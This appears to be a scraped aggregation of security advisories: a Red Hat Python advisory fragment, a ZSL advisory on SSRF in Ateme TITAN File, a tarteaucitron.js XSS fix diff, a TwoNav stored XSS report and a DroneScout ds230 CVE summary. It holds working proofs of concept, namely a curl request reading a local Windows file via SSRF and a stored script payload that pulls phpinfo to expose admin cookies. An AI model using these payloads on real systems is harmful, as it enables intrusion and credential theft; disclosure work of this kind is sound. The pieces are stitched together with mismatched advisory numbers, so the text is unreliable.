Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkrCiuAAoJENzjgjWX9erEM2gP/2vUJQvf383OISO9rO36AQ/J  
CpvJsVopoqPsOM9efR4Wlj272mPOGAn2dih6ZBqEX2nvCwrP3yKExqhy1b6k+36M  
dXBG2ZAp7bLKbfp4Q+FPSBcHx/TRnS9cWkQ5O7bNroZKAxA6eqv73peiGAWf3B+L  
8GHRrZkniv0X+oiWTASrziEfjuUta4GhhIQxnDMt2vAj62zN+PNTULtgOkG0o8E3  
7mnL5aJ48JgaPk8SiZNlozE6gVPpUYFCkzM9IIq+LrLLS0hXSiJGv6vRB1NTMmgy  
5YrXqbo/xKsZtFGJgXb3OPO+tRBvisDenkSIZ9XCeKWM/duuSXPfjctsVDgVtOkt  
gK6sAy9D3Tug6oXNIUZpKh0/ndyxwTjXG3GEHlQOdvuCH7OpIhkBKiDFxKbQHNqj  
1tf3PmKDkArTRC7DTAD3Q+pYuDJgu5/PMBZLvp4Ok7TXODPlCKUlp+PC/CLcBi4w  
kmJIn6n0G05JcnBCbSV0pHY+z/QGfNQwB4AL5Pg9AAq4vYZis0nlg8OBJ8Xyih00  
tzajFvLXPbJ4DJ+wcopzQFB/HJ/m/F4uH9z9+b73QigiomCs8MWLXRvfDO2GkOkK  
KkiPj9RWrcXBuCOwPXVVJi9/bwGPT7tufXWei+X1WwBqf537Tkg9r001EOvGtzSc  
LJnVw0+s1xYM+2cYsVa5  
=OCZA  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4003-01

Red Hat Security Advisory 2023-4004-01 - Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems. Issues addressed include a bypass vulnerability.

Red Hat Security Advisory 2023-4004-01

Ateme TITAN File version 3.9 suffers from a server-side request forgery vulnerability that allows for file enumeration.

  
Ateme TITAN File 3.9 Job Callbacks SSRF File Enumeration

Vendor: Ateme  
Product web page: https://www.ateme.com  
Affected version: 3.9.12.4  
                  3.9.11.0  
                  3.9.9.2  
                  3.9.8.0

Summary: TITAN File is a multi-codec/format video transcoding  
software, for mezzanine, STB and ABR VOD, PostProduction, Playout  
and Archive applications. TITAN File is based on ATEME 5th Generation  
STREAM compression engine and delivers the highest video quality  
at minimum bitrates with accelerated parallel processing.

Desc: Authenticated Server-Side Request Forgery (SSRF) vulnerability  
exists in the Titan File video transcoding software. The application  
parses user supplied data in the job callback url GET parameter. Since  
no validation is carried out on the parameter, an attacker can specify  
an external domain and force the application to make an HTTP/DNS/File  
request to an arbitrary destination. This can be used by an external  
attacker for example to bypass firewalls and initiate a service, file  
and network enumeration on the internal network through the affected  
application.

Tested on: Microsoft Windows  
           NodeJS  
           Ateme KFE Software

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2023-5781  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5781.php

22.04.2023

--

curl -vk -H "X-TITAN-WEB-HASTOKEN: true" \  
         -H "X-TITAN-WEB-TOKEN: 54E83A8B-E9E9-9C87-886A-12CB091AB251" \  
         -H "User-Agent: sunee-mode" \  
         "https://10.0.0.8/cmd?data=<callback_test><url><!\[CDATA\[file://c:\\\\windows\\\\system.ini\]\]></url><state><!\[CDATA\[encoding\]\]></state></callback_test>"

Call to file://C:\\windows\\system.ini returned 0

---

HTTP from Server  
----------------

POST / HTTP/1.1  
Host: ssrftest.zeroscience.mk  
Accept: */*  
Content-Type: application/xml  
Content-Length: 192

<?xml version='1.0' encoding='UTF-8' ?>  
<update>  
   <id>0000</id>  
   <name>dummy test job</name>  
   <status>aborted</status>  
   <progress>50</progress>  
   <message>message</message>  
</update>

Ateme TITAN File 3.9 Job Callbacks Server-Side Request Forgery

Cross-site Scripting (XSS) - Stored in GitHub repository amauric/tarteaucitron.js prior to v1.13.1.

**tarteaucitron.js vulnerable to Cross-site Scripting**

Moderate severity GitHub Reviewed Published Jul 11, 2023 to the GitHub Advisory Database • Updated Jul 11, 2023

GHSA-f44m-65h3-99vc: tarteaucitron.js vulnerable to Cross-site Scripting

Expand Up

@@ -2083,7 +2083,13 @@ var tarteaucitron = {

return elem.getAttribute('height') || elem.clientHeight;

},

"getElemAttr": function (elem, attr) {

return elem.getAttribute('data-' + attr) || elem.getAttribute(attr);

var attribute \= elem.getAttribute('data-' + attr) || elem.getAttribute(attr);

  

if (typeof attribute \=== 'string') {

return tarteaucitron.fixSelfXSS(attribute);

}

  

return "";

},

"addClickEventToId": function (elemId, func) {

tarteaucitron.addClickEventToElement(document.getElementById(elemId), func);

Expand Down

CVE-2023-3620: Filter the attr to avoid possible XSS vulnerability Fix #1132 · AmauriC/tarteaucitron.js@c4c2fcf

TwoNav v2.0.28-20230624 is vulnerable to Cross Site Scripting (XSS).

Vulnerability Product:TwoNav v2.0.28-20230624  
Vulnerability version: v2.0.28-20230624  
Vulnerability type: Stored XSS  
Vulnerability Details:  
Vulnerability location:add header 、"/index.php?c=api&method=read\_data&type=phpinfo&u=admin"

The default settings allowing free register, causes stored XSS  
the Stored XSS payload could let admin call phpinfo(); and bypassing the http-only , causes disclosure of cookies、root path of websites、variables of PHP and stuff

firstly , register an account at http://localhost/?c=login,  
account : test  
password : test  

then go to "站点设置",  
because of the http-only, you need to let admin call phpinfo(), the api is this : http://localhost/index.php?c=api&method=read\_data&type=phpinfo&u=admin  
enter the payload at the input of "头部(header)代码 - 用户", :

payload:

<script src\="http://cdn.bootcss.com/jquery/1.11.0/jquery.min.js" type\="text/javascript"\></script\>
<script\>
$.ajax({
                url: '/index.php?c=api&method=read\_data&type=phpinfo&u=admin',
                type: 'get',
                success: function (data) {
                    console.log(data);
                }
            })
</script>

and click "保存"  

after it , when an admin enter the page "http://localhost/?u=test", the page will automatically get phpinfo and call console.log() print it  
(Certainly you can update the payload to send phpinfo to your server, console log is a test)  
  
finally ,we download phpinfo and open it in html ,  
here is large number of cookies was disclosed, and root path of website  
  

proved Stored XSS

discovered by leeya\_bug

CVE-2023-37657: [Warning] Stored XSS in TwoNav v2.0.28-20230624 · Issue #3 · tznb1/TwoNav

DroneScout ds230 Remote ID receiver from BlueMark Innovations is affected by an information loss vulnerability through traffic injection.

An attacker can exploit this vulnerability by injecting, on carefully selected channels, high power spoofed Open Drone ID (ODID) messages which force the DroneScout ds230 Remote ID receiver to drop real Remote ID (RID) information and, instead, generate and transmit JSON encoded MQTT messages containing crafted RID information. Consequently, the MQTT broker, typically operated by a system integrator, will have no access to the drones’ real RID information.

This issue affects the adjacent channel suppression algorithm present in DroneScout ds230 firmware from version 20211210-1627 through 20230329-1042.

**CVE-2023-31191**

**Summary**

DroneScout ds230 Remote ID receiver from BlueMark Innovations is affected by an information loss vulnerability through traffic injection.

**Impact**

An attacker can exploit this vulnerability by injecting, on carefully selected channels, high power spoofed Open Drone ID (ODID) messages which force the DroneScout ds230 Remote ID receiver to drop real Remote ID (RID) information and, instead, generate and transmit JSON encoded MQTT messages containing crafted RID information.

**Affects**

The vulnerability affects:  
DroneScout ds230 from firmware version 20230104-1650 to firmware version 20230329-1042

**CVSS Details**

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H

**Solution**

Update to firmware version newer than 20230329-1042

**Acknowledgments**  

Nicolò Facchi of Nozomi Networks

**Threat **Intelligence****

****Curated and maintained by Nozomi Networks Labs, the Threat Intelligence™ service provides threat and vulnerability updates to Guardian, making it easy for IT/OT professionals to stay on top of current OT and IoT risks.****

> Threat actors love finding new ways to attack critical infrastructure. We love finding new ways to detect their malware before damage occurs.
> 
> **Andrea Carcano & MorenoCarullo**  
> Co-founders, Nozomi Networks

**Let's get started**

Discover how easy it is to anticipate, diagnose and respond to cyber threats and process issues before they impact your operations.

Tag

#js